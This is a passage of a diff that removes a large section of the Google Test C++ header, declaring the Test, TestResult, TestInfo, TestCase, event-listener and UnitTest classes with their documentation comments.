-  static bool HasFatalFailure();
-
-  // Returns true iff the current test has a non-fatal failure.
-  static bool HasNonfatalFailure();
-
-  // Returns true iff the current test has a (either fatal or
-  // non-fatal) failure.
-  static bool HasFailure() { return HasFatalFailure() || HasNonfatalFailure(); }
-
-  // Logs a property for the current test, test case, or for the entire
-  // invocation of the test program when used outside of the context of a
-  // test case.  Only the last value for a given key is remembered.  These
-  // are public static so they can be called from utility functions that are
-  // not members of the test fixture.  Calls to RecordProperty made during
-  // lifespan of the test (from the moment its constructor starts to the
-  // moment its destructor finishes) will be output in XML as attributes of
-  // the <testcase> element.  Properties recorded from fixture's
-  // SetUpTestCase or TearDownTestCase are logged as attributes of the
-  // corresponding <testsuite> element.  Calls to RecordProperty made in the
-  // global context (before or after invocation of RUN_ALL_TESTS and from
-  // SetUp/TearDown method of Environment objects registered with Google
-  // Test) will be output as attributes of the <testsuites> element.
-  static void RecordProperty(const std::string& key, const std::string& value);
-  static void RecordProperty(const std::string& key, int value);
-
- protected:
-  // Creates a Test object.
-  Test();
-
-  // Sets up the test fixture.
-  virtual void SetUp();
-
-  // Tears down the test fixture.
-  virtual void TearDown();
-
- private:
-  // Returns true iff the current test has the same fixture class as
-  // the first test in the current test case.
-  static bool HasSameFixtureClass();
-
-  // Runs the test after the test fixture has been set up.
-  //
-  // A sub-class must implement this to define the test logic.
-  //
-  // DO NOT OVERRIDE THIS FUNCTION DIRECTLY IN A USER PROGRAM.
-  // Instead, use the TEST or TEST_F macro.
-  virtual void TestBody() = 0;
-
-  // Sets up, executes, and tears down the test.
-  void Run();
-
-  // Deletes self.  We deliberately pick an unusual name for this
-  // internal method to avoid clashing with names used in user TESTs.
-  void DeleteSelf_() { delete this; }
-
-  // Uses a GTestFlagSaver to save and restore all Google Test flags.
-  const internal::GTestFlagSaver* const gtest_flag_saver_;
-
-  // Often a user misspells SetUp() as Setup() and spends a long time
-  // wondering why it is never called by Google Test.  The declaration of
-  // the following method is solely for catching such an error at
-  // compile time:
-  //
-  //   - The return type is deliberately chosen to be not void, so it
-  //   will be a conflict if void Setup() is declared in the user's
-  //   test fixture.
-  //
-  //   - This method is private, so it will be another compiler error
-  //   if the method is called from the user's test fixture.
-  //
-  // DO NOT OVERRIDE THIS FUNCTION.
-  //
-  // If you see an error about overriding the following function or
-  // about it being private, you have mis-spelled SetUp() as Setup().
-  struct Setup_should_be_spelled_SetUp {};
-  virtual Setup_should_be_spelled_SetUp* Setup() { return NULL; }
-
-  // We disallow copying Tests.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(Test);
-};
-
-typedef internal::TimeInMillis TimeInMillis;
-
-// A copyable object representing a user specified test property which can be
-// output as a key/value string pair.
-//
-// Don't inherit from TestProperty as its destructor is not virtual.
-class TestProperty {
- public:
-  // C'tor.  TestProperty does NOT have a default constructor.
-  // Always use this constructor (with parameters) to create a
-  // TestProperty object.
-  TestProperty(const std::string& a_key, const std::string& a_value) :
-    key_(a_key), value_(a_value) {
-  }
-
-  // Gets the user supplied key.
-  const char* key() const {
-    return key_.c_str();
-  }
-
-  // Gets the user supplied value.
-  const char* value() const {
-    return value_.c_str();
-  }
-
-  // Sets a new value, overriding the one supplied in the constructor.
-  void SetValue(const std::string& new_value) {
-    value_ = new_value;
-  }
-
- private:
-  // The key supplied by the user.
-  std::string key_;
-  // The value supplied by the user.
-  std::string value_;
-};
-
-// The result of a single Test.  This includes a list of
-// TestPartResults, a list of TestProperties, a count of how many
-// death tests there are in the Test, and how much time it took to run
-// the Test.
-//
-// TestResult is not copyable.
-class GTEST_API_ TestResult {
- public:
-  // Creates an empty TestResult.
-  TestResult();
-
-  // D'tor.  Do not inherit from TestResult.
-  ~TestResult();
-
-  // Gets the number of all test parts.  This is the sum of the number
-  // of successful test parts and the number of failed test parts.
-  int total_part_count() const;
-
-  // Returns the number of the test properties.
-  int test_property_count() const;
-
-  // Returns true iff the test passed (i.e. no test part failed).
-  bool Passed() const { return !Failed(); }
-
-  // Returns true iff the test failed.
-  bool Failed() const;
-
-  // Returns true iff the test fatally failed.
-  bool HasFatalFailure() const;
-
-  // Returns true iff the test has a non-fatal failure.
-  bool HasNonfatalFailure() const;
-
-  // Returns the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const { return elapsed_time_; }
-
-  // Returns the i-th test part result among all the results. i can range
-  // from 0 to test_property_count() - 1. If i is not in that range, aborts
-  // the program.
-  const TestPartResult& GetTestPartResult(int i) const;
-
-  // Returns the i-th test property. i can range from 0 to
-  // test_property_count() - 1. If i is not in that range, aborts the
-  // program.
-  const TestProperty& GetTestProperty(int i) const;
-
- private:
-  friend class TestInfo;
-  friend class TestCase;
-  friend class UnitTest;
-  friend class internal::DefaultGlobalTestPartResultReporter;
-  friend class internal::ExecDeathTest;
-  friend class internal::TestResultAccessor;
-  friend class internal::UnitTestImpl;
-  friend class internal::WindowsDeathTest;
-
-  // Gets the vector of TestPartResults.
-  const std::vector<TestPartResult>& test_part_results() const {
-    return test_part_results_;
-  }
-
-  // Gets the vector of TestProperties.
-  const std::vector<TestProperty>& test_properties() const {
-    return test_properties_;
-  }
-
-  // Sets the elapsed time.
-  void set_elapsed_time(TimeInMillis elapsed) { elapsed_time_ = elapsed; }
-
-  // Adds a test property to the list. The property is validated and may add
-  // a non-fatal failure if invalid (e.g., if it conflicts with reserved
-  // key names). If a property is already recorded for the same key, the
-  // value will be updated, rather than storing multiple values for the same
-  // key.  xml_element specifies the element for which the property is being
-  // recorded and is used for validation.
-  void RecordProperty(const std::string& xml_element,
-                      const TestProperty& test_property);
-
-  // Adds a failure if the key is a reserved attribute of Google Test
-  // testcase tags.  Returns true if the property is valid.
-  // TODO(russr): Validate attribute names are legal and human readable.
-  static bool ValidateTestProperty(const std::string& xml_element,
-                                   const TestProperty& test_property);
-
-  // Adds a test part result to the list.
-  void AddTestPartResult(const TestPartResult& test_part_result);
-
-  // Returns the death test count.
-  int death_test_count() const { return death_test_count_; }
-
-  // Increments the death test count, returning the new count.
-  int increment_death_test_count() { return ++death_test_count_; }
-
-  // Clears the test part results.
-  void ClearTestPartResults();
-
-  // Clears the object.
-  void Clear();
-
-  // Protects mutable state of the property vector and of owned
-  // properties, whose values may be updated.
-  internal::Mutex test_properites_mutex_;
-
-  // The vector of TestPartResults
-  std::vector<TestPartResult> test_part_results_;
-  // The vector of TestProperties
-  std::vector<TestProperty> test_properties_;
-  // Running count of death tests.
-  int death_test_count_;
-  // The elapsed time, in milliseconds.
-  TimeInMillis elapsed_time_;
-
-  // We disallow copying TestResult.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestResult);
-};  // class TestResult
-
-// A TestInfo object stores the following information about a test:
-//
-//   Test case name
-//   Test name
-//   Whether the test should be run
-//   A function pointer that creates the test object when invoked
-//   Test result
-//
-// The constructor of TestInfo registers itself with the UnitTest
-// singleton such that the RUN_ALL_TESTS() macro knows which tests to
-// run.
-class GTEST_API_ TestInfo {
- public:
-  // Destructs a TestInfo object.  This function is not virtual, so
-  // don't inherit from TestInfo.
-  ~TestInfo();
-
-  // Returns the test case name.
-  const char* test_case_name() const { return test_case_name_.c_str(); }
-
-  // Returns the test name.
-  const char* name() const { return name_.c_str(); }
-
-  // Returns the name of the parameter type, or NULL if this is not a typed
-  // or a type-parameterized test.
-  const char* type_param() const {
-    if (type_param_.get() != NULL)
-      return type_param_->c_str();
-    return NULL;
-  }
-
-  // Returns the text representation of the value parameter, or NULL if this
-  // is not a value-parameterized test.
-  const char* value_param() const {
-    if (value_param_.get() != NULL)
-      return value_param_->c_str();
-    return NULL;
-  }
-
-  // Returns true if this test should run, that is if the test is not
-  // disabled (or it is disabled but the also_run_disabled_tests flag has
-  // been specified) and its full name matches the user-specified filter.
-  //
-  // Google Test allows the user to filter the tests by their full names.
-  // The full name of a test Bar in test case Foo is defined as
-  // "Foo.Bar".  Only the tests that match the filter will run.
-  //
-  // A filter is a colon-separated list of glob (not regex) patterns,
-  // optionally followed by a '-' and a colon-separated list of
-  // negative patterns (tests to exclude).  A test is run if it
-  // matches one of the positive patterns and does not match any of
-  // the negative patterns.
-  //
-  // For example, *A*:Foo.* is a filter that matches any string that
-  // contains the character 'A' or starts with "Foo.".
-  bool should_run() const { return should_run_; }
-
-  // Returns true iff this test will appear in the XML report.
-  bool is_reportable() const {
-    // For now, the XML report includes all tests matching the filter.
-    // In the future, we may trim tests that are excluded because of
-    // sharding.
-    return matches_filter_;
-  }
-
-  // Returns the result of the test.
-  const TestResult* result() const { return &result_; }
-
- private:
-#if GTEST_HAS_DEATH_TEST
-  friend class internal::DefaultDeathTestFactory;
-#endif  // GTEST_HAS_DEATH_TEST
-  friend class Test;
-  friend class TestCase;
-  friend class internal::UnitTestImpl;
-  friend class internal::StreamingListenerTest;
-  friend TestInfo* internal::MakeAndRegisterTestInfo(
-      const char* test_case_name,
-      const char* name,
-      const char* type_param,
-      const char* value_param,
-      internal::TypeId fixture_class_id,
-      Test::SetUpTestCaseFunc set_up_tc,
-      Test::TearDownTestCaseFunc tear_down_tc,
-      internal::TestFactoryBase* factory);
-
-  // Constructs a TestInfo object. The newly constructed instance assumes
-  // ownership of the factory object.
-  TestInfo(const std::string& test_case_name,
-           const std::string& name,
-           const char* a_type_param,   // NULL if not a type-parameterized test
-           const char* a_value_param,  // NULL if not a value-parameterized test
-           internal::TypeId fixture_class_id,
-           internal::TestFactoryBase* factory);
-
-  // Increments the number of death tests encountered in this test so
-  // far.
-  int increment_death_test_count() {
-    return result_.increment_death_test_count();
-  }
-
-  // Creates the test object, runs it, records its result, and then
-  // deletes it.
-  void Run();
-
-  static void ClearTestResult(TestInfo* test_info) {
-    test_info->result_.Clear();
-  }
-
-  // These fields are immutable properties of the test.
-  const std::string test_case_name_;     // Test case name
-  const std::string name_;               // Test name
-  // Name of the parameter type, or NULL if this is not a typed or a
-  // type-parameterized test.
-  const internal::scoped_ptr<const ::std::string> type_param_;
-  // Text representation of the value parameter, or NULL if this is not a
-  // value-parameterized test.
-  const internal::scoped_ptr<const ::std::string> value_param_;
-  const internal::TypeId fixture_class_id_;   // ID of the test fixture class
-  bool should_run_;                 // True iff this test should run
-  bool is_disabled_;                // True iff this test is disabled
-  bool matches_filter_;             // True if this test matches the
-                                    // user-specified filter.
-  internal::TestFactoryBase* const factory_;  // The factory that creates
-                                              // the test object
-
-  // This field is mutable and needs to be reset before running the
-  // test for the second time.
-  TestResult result_;
-
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestInfo);
-};
-
-// A test case, which consists of a vector of TestInfos.
-//
-// TestCase is not copyable.
-class GTEST_API_ TestCase {
- public:
-  // Creates a TestCase with the given name.
-  //
-  // TestCase does NOT have a default constructor.  Always use this
-  // constructor to create a TestCase object.
-  //
-  // Arguments:
-  //
-  //   name:         name of the test case
-  //   a_type_param: the name of the test's type parameter, or NULL if
-  //                 this is not a type-parameterized test.
-  //   set_up_tc:    pointer to the function that sets up the test case
-  //   tear_down_tc: pointer to the function that tears down the test case
-  TestCase(const char* name, const char* a_type_param,
-           Test::SetUpTestCaseFunc set_up_tc,
-           Test::TearDownTestCaseFunc tear_down_tc);
-
-  // Destructor of TestCase.
-  virtual ~TestCase();
-
-  // Gets the name of the TestCase.
-  const char* name() const { return name_.c_str(); }
-
-  // Returns the name of the parameter type, or NULL if this is not a
-  // type-parameterized test case.
-  const char* type_param() const {
-    if (type_param_.get() != NULL)
-      return type_param_->c_str();
-    return NULL;
-  }
-
-  // Returns true if any test in this test case should run.
-  bool should_run() const { return should_run_; }
-
-  // Gets the number of successful tests in this test case.
-  int successful_test_count() const;
-
-  // Gets the number of failed tests in this test case.
-  int failed_test_count() const;
-
-  // Gets the number of disabled tests that will be reported in the XML report.
-  int reportable_disabled_test_count() const;
-
-  // Gets the number of disabled tests in this test case.
-  int disabled_test_count() const;
-
-  // Gets the number of tests to be printed in the XML report.
-  int reportable_test_count() const;
-
-  // Get the number of tests in this test case that should run.
-  int test_to_run_count() const;
-
-  // Gets the number of all tests in this test case.
-  int total_test_count() const;
-
-  // Returns true iff the test case passed.
-  bool Passed() const { return !Failed(); }
-
-  // Returns true iff the test case failed.
-  bool Failed() const { return failed_test_count() > 0; }
-
-  // Returns the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const { return elapsed_time_; }
-
-  // Returns the i-th test among all the tests. i can range from 0 to
-  // total_test_count() - 1. If i is not in that range, returns NULL.
-  const TestInfo* GetTestInfo(int i) const;
-
-  // Returns the TestResult that holds test properties recorded during
-  // execution of SetUpTestCase and TearDownTestCase.
-  const TestResult& ad_hoc_test_result() const { return ad_hoc_test_result_; }
-
- private:
-  friend class Test;
-  friend class internal::UnitTestImpl;
-
-  // Gets the (mutable) vector of TestInfos in this TestCase.
-  std::vector<TestInfo*>& test_info_list() { return test_info_list_; }
-
-  // Gets the (immutable) vector of TestInfos in this TestCase.
-  const std::vector<TestInfo*>& test_info_list() const {
-    return test_info_list_;
-  }
-
-  // Returns the i-th test among all the tests. i can range from 0 to
-  // total_test_count() - 1. If i is not in that range, returns NULL.
-  TestInfo* GetMutableTestInfo(int i);
-
-  // Sets the should_run member.
-  void set_should_run(bool should) { should_run_ = should; }
-
-  // Adds a TestInfo to this test case.  Will delete the TestInfo upon
-  // destruction of the TestCase object.
-  void AddTestInfo(TestInfo * test_info);
-
-  // Clears the results of all tests in this test case.
-  void ClearResult();
-
-  // Clears the results of all tests in the given test case.
-  static void ClearTestCaseResult(TestCase* test_case) {
-    test_case->ClearResult();
-  }
-
-  // Runs every test in this TestCase.
-  void Run();
-
-  // Runs SetUpTestCase() for this TestCase.  This wrapper is needed
-  // for catching exceptions thrown from SetUpTestCase().
-  void RunSetUpTestCase() { (*set_up_tc_)(); }
-
-  // Runs TearDownTestCase() for this TestCase.  This wrapper is
-  // needed for catching exceptions thrown from TearDownTestCase().
-  void RunTearDownTestCase() { (*tear_down_tc_)(); }
-
-  // Returns true iff test passed.
-  static bool TestPassed(const TestInfo* test_info) {
-    return test_info->should_run() && test_info->result()->Passed();
-  }
-
-  // Returns true iff test failed.
-  static bool TestFailed(const TestInfo* test_info) {
-    return test_info->should_run() && test_info->result()->Failed();
-  }
-
-  // Returns true iff the test is disabled and will be reported in the XML
-  // report.
-  static bool TestReportableDisabled(const TestInfo* test_info) {
-    return test_info->is_reportable() && test_info->is_disabled_;
-  }
-
-  // Returns true iff test is disabled.
-  static bool TestDisabled(const TestInfo* test_info) {
-    return test_info->is_disabled_;
-  }
-
-  // Returns true iff this test will appear in the XML report.
-  static bool TestReportable(const TestInfo* test_info) {
-    return test_info->is_reportable();
-  }
-
-  // Returns true if the given test should run.
-  static bool ShouldRunTest(const TestInfo* test_info) {
-    return test_info->should_run();
-  }
-
-  // Shuffles the tests in this test case.
-  void ShuffleTests(internal::Random* random);
-
-  // Restores the test order to before the first shuffle.
-  void UnshuffleTests();
-
-  // Name of the test case.
-  std::string name_;
-  // Name of the parameter type, or NULL if this is not a typed or a
-  // type-parameterized test.
-  const internal::scoped_ptr<const ::std::string> type_param_;
-  // The vector of TestInfos in their original order.  It owns the
-  // elements in the vector.
-  std::vector<TestInfo*> test_info_list_;
-  // Provides a level of indirection for the test list to allow easy
-  // shuffling and restoring the test order.  The i-th element in this
-  // vector is the index of the i-th test in the shuffled test list.
-  std::vector<int> test_indices_;
-  // Pointer to the function that sets up the test case.
-  Test::SetUpTestCaseFunc set_up_tc_;
-  // Pointer to the function that tears down the test case.
-  Test::TearDownTestCaseFunc tear_down_tc_;
-  // True iff any test in this test case should run.
-  bool should_run_;
-  // Elapsed time, in milliseconds.
-  TimeInMillis elapsed_time_;
-  // Holds test properties recorded during execution of SetUpTestCase and
-  // TearDownTestCase.
-  TestResult ad_hoc_test_result_;
-
-  // We disallow copying TestCases.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestCase);
-};
-
-// An Environment object is capable of setting up and tearing down an
-// environment.  You should subclass this to define your own
-// environment(s).
-//
-// An Environment object does the set-up and tear-down in virtual
-// methods SetUp() and TearDown() instead of the constructor and the
-// destructor, as:
-//
-//   1. You cannot safely throw from a destructor.  This is a problem
-//      as in some cases Google Test is used where exceptions are enabled, and
-//      we may want to implement ASSERT_* using exceptions where they are
-//      available.
-//   2. You cannot use ASSERT_* directly in a constructor or
-//      destructor.
-class Environment {
- public:
-  // The d'tor is virtual as we need to subclass Environment.
-  virtual ~Environment() {}
-
-  // Override this to define how to set up the environment.
-  virtual void SetUp() {}
-
-  // Override this to define how to tear down the environment.
-  virtual void TearDown() {}
- private:
-  // If you see an error about overriding the following function or
-  // about it being private, you have mis-spelled SetUp() as Setup().
-  struct Setup_should_be_spelled_SetUp {};
-  virtual Setup_should_be_spelled_SetUp* Setup() { return NULL; }
-};
-
-// The interface for tracing execution of tests. The methods are organized in
-// the order the corresponding events are fired.
-class TestEventListener {
- public:
-  virtual ~TestEventListener() {}
-
-  // Fired before any test activity starts.
-  virtual void OnTestProgramStart(const UnitTest& unit_test) = 0;
-
-  // Fired before each iteration of tests starts.  There may be more than
-  // one iteration if GTEST_FLAG(repeat) is set. iteration is the iteration
-  // index, starting from 0.
-  virtual void OnTestIterationStart(const UnitTest& unit_test,
-                                    int iteration) = 0;
-
-  // Fired before environment set-up for each iteration of tests starts.
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& unit_test) = 0;
-
-  // Fired after environment set-up for each iteration of tests ends.
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& unit_test) = 0;
-
-  // Fired before the test case starts.
-  virtual void OnTestCaseStart(const TestCase& test_case) = 0;
-
-  // Fired before the test starts.
-  virtual void OnTestStart(const TestInfo& test_info) = 0;
-
-  // Fired after a failed assertion or a SUCCEED() invocation.
-  virtual void OnTestPartResult(const TestPartResult& test_part_result) = 0;
-
-  // Fired after the test ends.
-  virtual void OnTestEnd(const TestInfo& test_info) = 0;
-
-  // Fired after the test case ends.
-  virtual void OnTestCaseEnd(const TestCase& test_case) = 0;
-
-  // Fired before environment tear-down for each iteration of tests starts.
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& unit_test) = 0;
-
-  // Fired after environment tear-down for each iteration of tests ends.
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& unit_test) = 0;
-
-  // Fired after each iteration of tests finishes.
-  virtual void OnTestIterationEnd(const UnitTest& unit_test,
-                                  int iteration) = 0;
-
-  // Fired after all test activities have ended.
-  virtual void OnTestProgramEnd(const UnitTest& unit_test) = 0;
-};
-
-// The convenience class for users who need to override just one or two
-// methods and are not concerned that a possible change to a signature of
-// the methods they override will not be caught during the build.  For
-// comments about each method please see the definition of TestEventListener
-// above.
-class EmptyTestEventListener : public TestEventListener {
- public:
-  virtual void OnTestProgramStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationStart(const UnitTest& /*unit_test*/,
-                                    int /*iteration*/) {}
-  virtual void OnEnvironmentsSetUpStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnEnvironmentsSetUpEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestCaseStart(const TestCase& /*test_case*/) {}
-  virtual void OnTestStart(const TestInfo& /*test_info*/) {}
-  virtual void OnTestPartResult(const TestPartResult& /*test_part_result*/) {}
-  virtual void OnTestEnd(const TestInfo& /*test_info*/) {}
-  virtual void OnTestCaseEnd(const TestCase& /*test_case*/) {}
-  virtual void OnEnvironmentsTearDownStart(const UnitTest& /*unit_test*/) {}
-  virtual void OnEnvironmentsTearDownEnd(const UnitTest& /*unit_test*/) {}
-  virtual void OnTestIterationEnd(const UnitTest& /*unit_test*/,
-                                  int /*iteration*/) {}
-  virtual void OnTestProgramEnd(const UnitTest& /*unit_test*/) {}
-};
-
-// TestEventListeners lets users add listeners to track events in Google Test.
-class GTEST_API_ TestEventListeners {
- public:
-  TestEventListeners();
-  ~TestEventListeners();
-
-  // Appends an event listener to the end of the list. Google Test assumes
-  // the ownership of the listener (i.e. it will delete the listener when
-  // the test program finishes).
-  void Append(TestEventListener* listener);
-
-  // Removes the given event listener from the list and returns it.  It then
-  // becomes the caller's responsibility to delete the listener. Returns
-  // NULL if the listener is not found in the list.
-  TestEventListener* Release(TestEventListener* listener);
-
-  // Returns the standard listener responsible for the default console
-  // output.  Can be removed from the listeners list to shut down default
-  // console output.  Note that removing this object from the listener list
-  // with Release transfers its ownership to the caller and makes this
-  // function return NULL the next time.
-  TestEventListener* default_result_printer() const {
-    return default_result_printer_;
-  }
-
-  // Returns the standard listener responsible for the default XML output
-  // controlled by the --gtest_output=xml flag.  Can be removed from the
-  // listeners list by users who want to shut down the default XML output
-  // controlled by this flag and substitute it with custom one.  Note that
-  // removing this object from the listener list with Release transfers its
-  // ownership to the caller and makes this function return NULL the next
-  // time.
-  TestEventListener* default_xml_generator() const {
-    return default_xml_generator_;
-  }
-
- private:
-  friend class TestCase;
-  friend class TestInfo;
-  friend class internal::DefaultGlobalTestPartResultReporter;
-  friend class internal::NoExecDeathTest;
-  friend class internal::TestEventListenersAccessor;
-  friend class internal::UnitTestImpl;
-
-  // Returns repeater that broadcasts the TestEventListener events to all
-  // subscribers.
-  TestEventListener* repeater();
-
-  // Sets the default_result_printer attribute to the provided listener.
-  // The listener is also added to the listener list and previous
-  // default_result_printer is removed from it and deleted. The listener can
-  // also be NULL in which case it will not be added to the list. Does
-  // nothing if the previous and the current listener objects are the same.
-  void SetDefaultResultPrinter(TestEventListener* listener);
-
-  // Sets the default_xml_generator attribute to the provided listener.  The
-  // listener is also added to the listener list and previous
-  // default_xml_generator is removed from it and deleted. The listener can
-  // also be NULL in which case it will not be added to the list. Does
-  // nothing if the previous and the current listener objects are the same.
-  void SetDefaultXmlGenerator(TestEventListener* listener);
-
-  // Controls whether events will be forwarded by the repeater to the
-  // listeners in the list.
-  bool EventForwardingEnabled() const;
-  void SuppressEventForwarding();
-
-  // The actual list of listeners.
-  internal::TestEventRepeater* repeater_;
-  // Listener responsible for the standard result output.
-  TestEventListener* default_result_printer_;
-  // Listener responsible for the creation of the XML output file.
-  TestEventListener* default_xml_generator_;
-
-  // We disallow copying TestEventListeners.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(TestEventListeners);
-};
-
-// A UnitTest consists of a vector of TestCases.
-//
-// This is a singleton class.  The only instance of UnitTest is
-// created when UnitTest::GetInstance() is first called.  This
-// instance is never deleted.
-//
-// UnitTest is not copyable.
-//
-// This class is thread-safe as long as the methods are called
-// according to their specification.
-class GTEST_API_ UnitTest {
- public:
-  // Gets the singleton UnitTest object.  The first time this method
-  // is called, a UnitTest object is constructed and returned.
-  // Consecutive calls will return the same object.
-  static UnitTest* GetInstance();
-
-  // Runs all tests in this UnitTest object and prints the result.
-  // Returns 0 if successful, or 1 otherwise.
-  //
-  // This method can only be called from the main thread.
-  //
-  // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-  int Run() GTEST_MUST_USE_RESULT_;
-
-  // Returns the working directory when the first TEST() or TEST_F()
-  // was executed.  The UnitTest object owns the string.
-  const char* original_working_dir() const;
-
-  // Returns the TestCase object for the test that's currently running,
-  // or NULL if no test is running.
-  const TestCase* current_test_case() const
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Returns the TestInfo object for the test that's currently running,
-  // or NULL if no test is running.
-  const TestInfo* current_test_info() const
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Returns the random seed used at the start of the current test run.
-  int random_seed() const;
-
-#if GTEST_HAS_PARAM_TEST
-  // Returns the ParameterizedTestCaseRegistry object used to keep track of
-  // value-parameterized tests and instantiate and register them.
-  //
-  // INTERNAL IMPLEMENTATION - DO NOT USE IN A USER PROGRAM.
-  internal::ParameterizedTestCaseRegistry& parameterized_test_registry()
-      GTEST_LOCK_EXCLUDED_(mutex_);
-#endif  // GTEST_HAS_PARAM_TEST
-
-  // Gets the number of successful test cases.
-  int successful_test_case_count() const;
-
-  // Gets the number of failed test cases.
-  int failed_test_case_count() const;
-
-  // Gets the number of all test cases.
-  int total_test_case_count() const;
-
-  // Gets the number of all test cases that contain at least one test
-  // that should run.
-  int test_case_to_run_count() const;
-
-  // Gets the number of successful tests.
-  int successful_test_count() const;
-
-  // Gets the number of failed tests.
-  int failed_test_count() const;
-
-  // Gets the number of disabled tests that will be reported in the XML report.
-  int reportable_disabled_test_count() const;
-
-  // Gets the number of disabled tests.
-  int disabled_test_count() const;
-
-  // Gets the number of tests to be printed in the XML report.
-  int reportable_test_count() const;
-
-  // Gets the number of all tests.
-  int total_test_count() const;
-
-  // Gets the number of tests that should run.
-  int test_to_run_count() const;
-
-  // Gets the time of the test program start, in ms from the start of the
-  // UNIX epoch.
-  TimeInMillis start_timestamp() const;
-
-  // Gets the elapsed time, in milliseconds.
-  TimeInMillis elapsed_time() const;
-
-  // Returns true iff the unit test passed (i.e. all test cases passed).
-  bool Passed() const;
-
-  // Returns true iff the unit test failed (i.e. some test case failed
-  // or something outside of all tests failed).
-  bool Failed() const;
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  const TestCase* GetTestCase(int i) const;
-
-  // Returns the TestResult containing information on test failures and
-  // properties logged outside of individual test cases.
-  const TestResult& ad_hoc_test_result() const;
-
-  // Returns the list of event listeners that can be used to track events
-  // inside Google Test.
-  TestEventListeners& listeners();
-
- private:
-  // Registers and returns a global test environment.  When a test
-  // program is run, all global test environments will be set-up in
-  // the order they were registered.  After all tests in the program
-  // have finished, all global test environments will be torn-down in
-  // the *reverse* order they were registered.
-  //
-  // The UnitTest object takes ownership of the given environment.
-  //
-  // This method can only be called from the main thread.
-  Environment* AddEnvironment(Environment* env);
-
-  // Adds a TestPartResult to the current TestResult object.  All
-  // Google Test assertion macros (e.g. ASSERT_TRUE, EXPECT_EQ, etc)
-  // eventually call this to report their results.  The user code
-  // should use the assertion macros instead of calling this directly.
-  void AddTestPartResult(TestPartResult::Type result_type,
-                         const char* file_name,
-                         int line_number,
-                         const std::string& message,
-                         const std::string& os_stack_trace)
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Adds a TestProperty to the current TestResult object when invoked from
-  // inside a test, to current TestCase's ad_hoc_test_result_ when invoked
-  // from SetUpTestCase or TearDownTestCase, or to the global property set
-  // when invoked elsewhere.  If the result already contains a property with
-  // the same key, the value will be updated.
-  void RecordProperty(const std::string& key, const std::string& value);
-
-  // Gets the i-th test case among all the test cases. i can range from 0 to
-  // total_test_case_count() - 1. If i is not in that range, returns NULL.
-  TestCase* GetMutableTestCase(int i);
-
-  // Accessors for the implementation object.
-  internal::UnitTestImpl* impl() { return impl_; }
-  const internal::UnitTestImpl* impl() const { return impl_; }
-
-  // These classes and funcions are friends as they need to access private
-  // members of UnitTest.
-  friend class Test;
-  friend class internal::AssertHelper;
-  friend class internal::ScopedTrace;
-  friend class internal::StreamingListenerTest;
-  friend class internal::UnitTestRecordPropertyTestHelper;
-  friend Environment* AddGlobalTestEnvironment(Environment* env);
-  friend internal::UnitTestImpl* internal::GetUnitTestImpl();
-  friend void internal::ReportFailureInUnknownLocation(
-      TestPartResult::Type result_type,
-      const std::string& message);
-
-  // Creates an empty UnitTest.
-  UnitTest();
-
-  // D'tor
-  virtual ~UnitTest();
-
-  // Pushes a trace defined by SCOPED_TRACE() on to the per-thread
-  // Google Test trace stack.
-  void PushGTestTrace(const internal::TraceInfo& trace)
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Pops a trace from the per-thread Google Test trace stack.
-  void PopGTestTrace()
-      GTEST_LOCK_EXCLUDED_(mutex_);
-
-  // Protects mutable state in *impl_.  This is mutable as some const
-  // methods need to lock it too.
-  mutable internal::Mutex mutex_;
-
-  // Opaque implementation object.  This field is never changed once
-  // the object is constructed.  We don't mark it as const here, as
-  // doing so will cause a warning in the constructor of UnitTest.
-  // Mutable state in *impl_ is protected by mutex_.
-  internal::UnitTestImpl* impl_;
-
-  // We disallow copying UnitTest.
-  GTEST_DISALLOW_COPY_AND_ASSIGN_(UnitTest);
-};
-
-// A convenient wrapper for adding an environment for the test
-// program.
-//
-// You should call this before RUN_ALL_TESTS() is called, probably in
-// main().  If you use gtest_main, you need to call this before main()
-// starts for it to take effect.  For example, you can define a global
-// variable like this:
-//
-//   testing::Environment* const foo_env =
-//       testing::AddGlobalTestEnvironment(new FooEnvironment);
-//
-// However, we strongly recommend you to write your own main() and
-// call AddGlobalTestEnvironment() there, as relying on initialization
-// of global variables makes the code harder to read and may cause
-// problems when you register multiple environments from different
-// translation units and the environments have dependencies among them
-// (remember that the compiler doesn't guarantee the order in which
-// global variables from different translation units are initialized).
-inline Environment* AddGlobalTestEnvironment(Environment* env) {
-  return UnitTest::GetInstance()->AddEnvironment(env);
-}
-
-// Initializes Google Test.  This must be called before calling
-// RUN_ALL_TESTS().  In particular, it parses a command line for the
-// flags that Google Test recognizes.  Whenever a Google Test flag is
-// seen, it is removed from argv, and *argc is decremented.
-//
-// No value is returned.  Instead, the Google Test flag variables are
-// updated.
-//
-// Calling the function for the second time has no user-visible effect.
-GTEST_API_ void InitGoogleTest(int* argc, char** argv);
-
-// This overloaded version can be used in Windows programs compiled in
-// UNICODE mode.
-GTEST_API_ void InitGoogleTest(int* argc, wchar_t** argv);
-
-namespace internal {
-
-// FormatForComparison<ToPrint, OtherOperand>::Format(value) formats a
-// value of type ToPrint that is an operand of a comparison assertion
-// (e.g. ASSERT_EQ).  OtherOperand is the type of the other operand in
-// the comparison, and is used to help determine the best way to
-// format the value.  In particular, when the value is a C string
-// (char pointer) and the other operand is an STL string object, we
-// want to format the C string as a string, since we know it is
-// compared by value with the string object.  If the value is a char
-// pointer but the other operand is not an STL string object, we don't
-// know whether the pointer is supposed to point to a NUL-terminated
